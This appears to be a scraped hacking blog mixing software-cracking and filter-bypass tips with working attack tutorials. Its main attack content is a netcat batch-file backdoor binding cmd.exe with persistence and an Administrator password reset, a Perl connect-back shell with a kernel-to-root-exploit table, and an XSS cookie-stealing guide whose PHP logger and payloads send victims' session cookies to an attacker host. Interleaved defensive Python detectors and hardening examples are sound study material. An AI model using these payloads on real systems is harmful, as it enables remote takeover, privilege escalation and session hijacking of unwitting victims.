Search for cracked software on Google with this simple trick.
just type crack: app name
example: crack: flashget 1.6a
http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=crack%3A+flashget+1.6a
Flashget Broadband Tweak
Just double-click on the FlashGetRegTweak.reg file to enter the tweak into the registry. This tweak will allow up to 100 simultaneous file downloads, each split into a max of 30 parts. Previous defaults were 8 & 10 respectively.
Note:
1. Works for dialup but not really advantageous.
2. Restart your computer to feel the full advantage of this tweak.
Download:
here it is
just copy to notepad
rename to Iwillsinglehandedlykillallthebandwidthfromtheserversidownloadfrom.reg
REGEDIT4
[HKEY_CURRENT_USER\Software\JetCar\JetCar\General]
"Max Parallel Num"="100"
"MaxSimJobs"="100"
Converting movies to psp format
Posted by shashank | 1:30 AM | free english movies, hacking
Hey again, this is a real quick guide for anyone interested in getting a movie onto their PSP without all the fluff I have seen elsewhere. I just watched Africa the Serengeti on my PSP and here is the lowdown.
Movie - approx 40 minutes - dvd
Saved to hard drive - 2.6GIG - using DVD Decryptor (free program) try google
Transferred to avi format - 377MB - using Super DVD Ripper (9 FREE trial uses) then you must buy
Transferred to MP4 - 37MB - using the (basically free) Image convertor 2
Average movie breakdown - using above as a guide only.
So I'm guessing the average movie may be 4.5gig for example
saved to 800MB
CONVERTED TO 70-80MB
Ok use DVD decryptor to save the movie to your hard drive eg. C:\africa (it will save it for you as described)
When completed, find the folder c:\africa on your computer and find the vob file in that folder (generally the largest one), then right click and play it with your dvd program to see what part it is. If it's the correct movie part, you now know that's the one you need.
Once you have located the vob file you want to transfer, open DVD Ripper and go to the wizard icon. There you will see a VOB to AVI button. Click it and it will ask you to locate the file. Locate the file and click it. It will SCAN THE FILE (just wait till that finishes); a parameter box opens next, just click the arrow. It then asks you to choose the output file: click the file icon and locate the correct fob file. It then asks for file compression: choose microsoft windows media and click ok. Then press the start button. It will now convert the vob into avi format.
(There are also other options, i.e. dvd to avi etc.) I have only used the vob to avi for this test.
After DVD ripper has transferred the file it will save it to the same folder as the original movie was in, eg: c:\africa\viteots. Open the file and you will now see an AVI icon containing the movie.
Make sure your PSP is on and in usb mode, then open Image convertor 2 and press on movie / add to list. For this example I clicked on the C: drive, then found the folder Africa and opened it, and there was my converted AVI file. Click the file, press ok and it will be transferred to your PSP for viewing pleasure.
*****Note**** I only converted one VOB file as that's all there was for this particular movie. If you have more than one vob file you may need to try the dvd to avi when you rip. This is just a guide I worked out to compress dvd into the smallest possible file so you can get value out of a 512 card.
QUOTE
http://www.crazyhatsoftware.com/ImageConverter2.1.exe
Image Converter 2.1 JAP translated to ENG.
I wrote this because it really worked for me a few times and I hope it does for you too, all you need is a very gullible target.
As we all know, a Trojan is very likely to be picked up by AV. What you need is Netcat; netcat opens a port on a computer for access (if used correctly by a batch file, you open a port on a target computer). You will need to write a batch file. The batch file to copy netcat onto the remote computer will have to be run from the target computer (the person on the target will have to execute the batch file in some way). Open Notepad and type this in:
@echo off
cd\
xcopy \\yourIP\shared folder\netcat.exe
copy \\yourIP\shared folder\netcat.exe (just to be sure)
cd "Documents and Settings"
cd "All Users"
cd "Start Menu"
cd Programs
cd Startup
xcopy \\yourIP\shared folder\Startup.bat (This is another batch file you will write)
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
The next batch file will be used to make sure the port you specified opens up every time windows starts up, you can specify any port you wish. Open Notepad and type:
@echo off
cd\
netcat.exe -L -p 9999 -d -e cmd.exe
net user Administrator newpassword
Now from here you can do what you want, e.g try shutting down the target computer by browsing to his system32 folder and then type in:
shutdown -r -t 10 -c "Hello"
the computer will then restart in 10 seconds time. You can even play around more by Installing Cain & Abel on your computer and then installing Abel remotely on his computer (Since you know the Administrator password) Once you have Abel on the target you can start and stop services and do more!
Enjoy.
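Seen from the defending side, the two batch files above leave three traces in process-creation logging: netcat listening with `-L` and `-e cmd.exe`, a copy tool run inside the All Users Startup folder, and `net user Administrator ...` setting a password. The Python below is an added example, not part of the original post, that flags those three patterns; the rule names, the record layout (working directory plus command line, as Sysmon Event ID 1 records them) and the sample records are constructed for illustration.

```python
import ntpath

SHELLS = {"cmd", "powershell", "sh", "bash"}
COPY_TOOLS = {"copy", "xcopy", "robocopy", "move"}
STARTUP_DIR = r"\start menu\programs\startup"

# Constructed process-creation records: working directory + command line.
SAMPLE_EVENTS = [
    {"cwd": r"C:\Temp", "cmd": "netcat.exe -L -p 9999 -d -e cmd.exe"},
    {"cwd": r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup",
     "cmd": r"xcopy \\fileserver\share\Startup.bat"},
    {"cwd": r"C:\Temp", "cmd": "net user Administrator newpassword"},
    {"cwd": r"C:\Users\alice", "cmd": "net user alice /domain"},
    {"cwd": r"C:\Tools", "cmd": "nc.exe -z -v 10.0.0.5 443"},
]


def tool_name(token):
    """Lower-case executable name without directory or .exe suffix."""
    name = ntpath.basename(token.strip('"')).lower()
    return name[:-4] if name.endswith(".exe") else name


def classify(event):
    """Return the names of the rules one process-creation record matches."""
    tokens = event["cmd"].split()
    lower = [t.lower() for t in tokens]
    hits = []

    # Listening netcat (-l, or -L for persistent listen) that hands out a shell (-e).
    if "-l" in lower and "-e" in lower[:-1]:
        if tool_name(lower[lower.index("-e") + 1]) in SHELLS:
            hits.append("listener_with_shell")

    # A copy tool run in, or pointed at, a Startup folder (logon persistence).
    haystack = (event["cwd"] + " " + event["cmd"]).lower()
    if STARTUP_DIR in haystack and any(tool_name(t) in COPY_TOOLS for t in tokens):
        hits.append("startup_folder_copy")

    # "net user <account> <password>" sets a password; "/switch" forms do not.
    if (len(lower) >= 4 and tool_name(lower[0]) in {"net", "net1"}
            and lower[1] == "user" and not lower[3].startswith("/")):
        hits.append("local_password_reset")
    return hits


def scan(events):
    """Return (index, rule names) for every record that matched a rule."""
    flagged = []
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            flagged.append((index, hits))
    return flagged


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["cmd"], "->", ", ".join(hits))
```

The Startup rule needs the working directory because the batch file changes into the folder before copying, so the path never appears on the command line itself.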
Hello Everyone and welcome to my tutorial on rooting boxes!! Today you will learn one of many methods to rooting an "insecure" box. Obviously if you are reading this I don't think you will be using any 0-day kernel exploits :P. So basic things you will need for this tutorial to work for you will be the following:
Shell Access on a website is the first thing you will need. How you gain this access is entirely up to you. I would say most people will end up going with a simple remote file inclusion and place yourself a c99, r57, locust or any shell of your choice.
You will want to get yourself a version of NetCat Which you can find at this location
http://www.vulnwatch.org/netcat/nc111nt.zip
If you have an antivirus that auto deletes infected files or virii I would suggest disabling it, as some AVs will detect netcat as a hacktool or remote admin tool. Once you have downloaded netcat, open netcat up and it will ask you to enter a string for the command line. Reading up on netcat is recommended, but if you're lazy a string like this will do just fine: -vv -l -n -p
perl bc.pl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# IRAN HACKERS SABOTAGE Connect Back Shell
# code by:LorD
# We Are :LorD-C0d3r-NT-\x90
# Email:LorD@ihsteam.com
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/bash';
$ARGC=@ARGV;
print "IHS BACK-CONNECT BACKDOOR\n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "IHS BACK-CONNECT BACKDOOR \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
http://portforward.com/routers.htm
So Now that you have your tools and you have your shell access open up netcat and type in -vv -l -n -p 8080 for this tutorial we will connect on port 8080. Hit enter and it should start listening.
Go back to the server and upload your bc.pl. Execute the back connect with a command such as perl bc.pl uname -a;id
Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Here is a kernel reference for you all; it tells you which exploits work for the different kernels, just to give you a general idea. Note that this reference is kind of old but is still pretty accurate, though there could be newer exploits now.
2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 - 2.6.24 -> diane_lane_******_hard.c
2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
ex:gcc xpl.c -o xpl
From here, all you have to do is run your exploit, which can be done by simply typing this into your netcat connection: ./xpl
I know that there are many other methods of rooting boxes, but this is one method that people can use that is fairly easy to follow. If you have any comments about the method feel free to ask, but please don't knock it down. If you do not like this method, that's fine, you can write a tutorial for everyone using your own method.
Hope you enjoyed this tutorial and i hope it was helpful to you.
Tutorial by w3tw0rk shoutz to rootshell security team
http://www.rootshell-team.com
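Every step of the tutorial above runs as the web server account (the `uid=33(www-data)` in its output), which is what makes it detectable: a web service account has little reason to start an interpreter, run a compiler, or execute a binary it has just built. This added Python example, not part of the original tutorial, correlates exec records in time to flag that sequence; the record layout, account list, 15-minute window and sample records (including the documentation address 203.0.113.10) are constructed assumptions.

```python
import posixpath

SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}
INTERPRETERS = {"perl", "python", "python3", "sh", "bash"}
COMPILERS = {"gcc", "cc", "g++", "make"}

# Constructed exec records: (epoch seconds, user, argv), the kind of data
# an auditd execve rule or an EDR process feed provides.
SAMPLE_EXECS = [
    (100, "www-data", ["uname", "-a"]),
    (101, "www-data", ["id"]),
    (160, "www-data", ["perl", "bc.pl", "203.0.113.10", "8080"]),
    (400, "www-data", ["gcc", "xpl.c", "-o", "xpl"]),
    (430, "www-data", ["./xpl"]),
    (500, "deploy", ["gcc", "app.c", "-o", "app"]),
    (520, "deploy", ["./app"]),
]


def detect(events, window=900):
    """Return (time, user, reason) alerts for service-account activity.

    The strongest signal is stateful: the same service account runs a
    compiler and then, within `window` seconds, executes the output file.
    """
    built = {}   # (user, binary name) -> time the compiler produced it
    alerts = []
    for ts, user, argv in sorted(events, key=lambda e: e[0]):
        if user not in SERVICE_ACCOUNTS:
            continue  # developers and CI users compile and run code all day
        tool = posixpath.basename(argv[0])
        if tool in COMPILERS:
            alerts.append((ts, user, "compiler_run_by_service_account"))
            # Without -o the compiler writes a.out.
            out = argv[argv.index("-o") + 1] if "-o" in argv[:-1] else "a.out"
            built[(user, posixpath.basename(out))] = ts
        elif tool in INTERPRETERS:
            alerts.append((ts, user, "interpreter_run_by_service_account"))
        elif (user, tool) in built and ts - built[(user, tool)] <= window:
            alerts.append((ts, user, "ran_binary_it_just_compiled"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EXECS):
        print(alert)
```

On hosts where the web application legitimately shells out (CGI scripts, for example), the interpreter rule needs an allow-list; the compile-then-run correlation rarely does.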
Anonimity - One step further - Accessing Blocked Webs
Posted by shashank | 11:21 PM | anonymizer, hacking, sites, tech
Welcome to the new generation of Search Engines. This article is not really about search engines, though; it grew out of a need at my office. In my office I wasn't able to access all sites; only a few were accessible, including some "tech support forums", "Microsoft" etc. In this situation, most of us try to use proxy websites. In this article I will discuss a few ways your office people may block your internet access, and A NEW & Fresh way which will get you the access back.
Ways with which your company's IT dept. may block your internet connection
Note: There might be other ways, but these are the widely used ones.
1. Keyword Tracking:
In this method, there is no specific software which blocks the website. Whenever you open a website, its "index" is crawled. Depending on the text of the website, it is categorized on the server. A few categories will be allowed by your IT dept., like "computers & internet", which are necessary in any company. Most categories will be blocked, like "person & dating" and "adult & sexuality".
Even "iframe" content is crawled in this method. That's the reason proxies don't work: a proxy site will have words on it like proxy, access internet and so on, so the website is blocked under the "proxies & translators" category. Even if you find a proxy website which opens in your office, that wouldn't work, because the moment you open "orkut.com" in that proxy site, on the next page the part which is supposed to open orkut.com will say "blocked under category : personal & dating". So even a working proxy wouldn't help you.
This concept is quite confusing to new people. But this is the strongest defense. In this type, you cant even use
2. Access Allow Softwares:
Most of you know about this one: software blocking specific groups of websites. You can easily bypass it with SSH or some proxy sites. You can even edit registry keys and get your internet to work. So there is nothing much to write about it.
3. Manual Blocking
This mainly happens in small companies and is very easy to bypass. If you are a little more than average with computers, you can edit the account permissions or remove the blocked sites from the list and get access.
The New Generation of Proxy
So, coming right to the point, here's what helped me bypass my company's keyword-tracking type of block. This is a new search engine which lets you surf anonymously. As you know, most companies allow search engines, so most likely you will have access to it. And if you do, then consider your work done.
Yauba.com ---- Is the URL of the search engine.
Steps to follow to view blocked sites:
Advantages:
Disadvantages:
Off topic:

Shabbir, you should remember me asking you lots of times where you host G4E, because I used to think that my IT dept. works on the IP address of the websites: if it is a dedicated IP it will open, if it's shared it won't. I even created a few threads about it. Slowly I realised that it tracks the keyword. Luckily, at the same time this Yauba got released. If you notice, all other proxies encode the URLs as well, but Yauba has got advanced encoding, so even though the iframes are crawled it still works.
Stealing Cookies with XSS
Posted by shashank | 10:56 PM | cookie hacking, hacking, site, tech
I thought it was about time for someone to post a cookie stealing tutorial, so I decided to write one for you from the ground up.
NOTE: Again... this was written to educate you on the security aspects of the following information, not to teach you how to break the law or do something stupid. Use what you learn from this to make your website more secure/use better browsing habits, not break into other websites.
Background
First, make sure you've read these two articles because I'm going to assume you already understand everything written in them:
XSS Complete Guide
All About Cookies and Security
Now we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we'll get right to the code. Let's say a web page has a search function that uses this code:
Code:
<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>
We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:
Code:
<script>alert("test")</script>
When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:
Code:
<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>
Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:
Code:
"><script>alert("test")</script>
This should close the quotes and end the input tag so that our script is rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example,
Code:
http://www.site.com/search.php?q="><script>alert("test")</script>
Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here:
Code:
http://centricle.com/tools/ascii-hex/
Hexing the query of this url gives us
Code:
http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2f%73%63%72%69%70%74%3e
The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.
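The behaviour described above exists only because the search term is written into `value="..."` without output encoding. The following is an added example, not code from the original article: a Python stand-in for the page's search.php that renders the same row once by plain concatenation and once with attribute-safe escaping, then parses both the way a browser would, and percent-decodes the "hexed" link to show it carries the identical test string. All function names are hypothetical.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

ROW = ('<tr><td>Name</td><td><input type="text" name="advisor_name" '
       'value="{}"></td></tr>')
TEST_INPUT = '"><script>alert("test")</script>'   # the article's test string
HEXED_URL = ("http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e"
             "%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2f%73%63%72%69%70%74%3e")


def render_unescaped(q):
    """The flawed pattern: user input concatenated into the attribute."""
    return ROW.format(q)


def render_escaped(q):
    """The fix: encode &, <, >, double and single quotes before output."""
    return ROW.format(html.escape(q, quote=True))


def query_param(url, name="q"):
    """What the server receives; percent-encoding is undone before use."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


class _Collector(HTMLParser):
    """Records start tags and the value the <input> ends up holding."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def parse_row(markup):
    """Return (start tags, input value) as an HTML parser sees the row."""
    parser = _Collector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_value


if __name__ == "__main__":
    received = query_param(HEXED_URL)
    print("server receives:", received)
    print("unescaped:", parse_row(render_unescaped(received)))
    print("escaped:  ", parse_row(render_escaped(received)))
```

With escaping, the row still contains exactly one `<input>` and no `<script>` element, and the field shows the text the user typed; the percent-encoded link changes nothing because decoding happens before the value reaches the template.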
Using XSS to Steal Cookies
OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?
The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.
First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):
Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}
function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}
logData();
?>
This script will record the cookies of every user that views it.
Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:
Code:
"><script language= "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>
yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:
Code:
"><a href="#" onclick="document.location='http://yoursite.com/whateveryouwant.php?cookie=' +escape(document.cookie);"><Click Me></a></script>
This will eliminate the looping problem since the user has to click on it for it to work, and it's only a one-way link. Of course, then the user's trail ends at your cookie stealing script, so you'd need to modify that code a little to keep them from suspecting what's going on. You could just add some text to the page saying something like "under construction" by changing the end of our php script from this:
Code:
logData();
?>
to this:
Code:
logData();
echo '<b>Page Under Construction</b>'
?>
Now when you open log.txt, you should see something like this:
Code:
IP: 125.16.48.169 | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: http://www.ifa.org.nz/search.php |
DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373
You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.
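The replay described above depends on two things: the session cookie being readable from `document.cookie`, and the server accepting a session ID from any client that presents it. The following added example (not from the original article) shows the server-side counterpart in Python: the session cookie is issued with `HttpOnly`, `Secure` and `SameSite`, and the session is bound to the client it was issued to so that a replay from a different client is revoked. The `SessionStore` class, its return values and the sample addresses and User-Agent strings are constructed assumptions.

```python
import secrets
from http.cookies import SimpleCookie


def session_cookie_header(sid):
    """Build the Set-Cookie header for a session ID.

    HttpOnly keeps the cookie out of document.cookie, Secure keeps it off
    plain HTTP, SameSite=Lax stops it riding on cross-site subrequests.
    """
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = sid
    cookie["PHPSESSID"]["path"] = "/"
    cookie["PHPSESSID"]["httponly"] = True
    cookie["PHPSESSID"]["secure"] = True
    cookie["PHPSESSID"]["samesite"] = "Lax"
    return "Set-Cookie: " + cookie["PHPSESSID"].OutputString()


class SessionStore:
    """In-memory sessions bound to the client they were issued to."""

    def __init__(self):
        self._sessions = {}

    def issue(self, user, ip, user_agent):
        sid = secrets.token_hex(16)          # unguessable 128-bit ID
        self._sessions[sid] = {"user": user, "ip": ip, "ua": user_agent}
        return sid

    def validate(self, sid, ip, user_agent):
        """Return (decision, detail) for a request presenting `sid`."""
        session = self._sessions.get(sid)
        if session is None:
            return ("reject", "unknown session")
        if session["ua"] != user_agent:
            # A browser does not change identity mid-session: revoke.
            del self._sessions[sid]
            return ("revoke", "user-agent changed")
        if session["ip"] != ip:
            # Addresses change legitimately (mobile, VPN): ask to log in again.
            return ("reauth", "ip changed")
        return ("ok", session["user"])


if __name__ == "__main__":
    store = SessionStore()
    firefox = "Mozilla/5.0 (X11; Linux i686) Firefox/3.0.8"   # constructed
    sid = store.issue("alice", "198.51.100.7", firefox)
    print(session_cookie_header(sid))
    print(store.validate(sid, "198.51.100.7", firefox))
    print(store.validate(sid, "203.0.113.50", "curl/8.0"))
    print(store.validate(sid, "198.51.100.7", firefox))
```

In PHP the same cookie flags are set with the `session.cookie_httponly`, `session.cookie_secure` and `session.cookie_samesite` settings. The client-binding check is a tripwire rather than a guarantee, since request headers are supplied by the client; `HttpOnly` together with output encoding is what stops the cookie being read in the first place.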
Summary
So in summary:
1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.
References
I originally posted this article on TechMafias.com but reposted it here for the go4expert community.
Code:
http://techmafias.com/forum/Thread-tutorial-cookie-stealing-with-xss
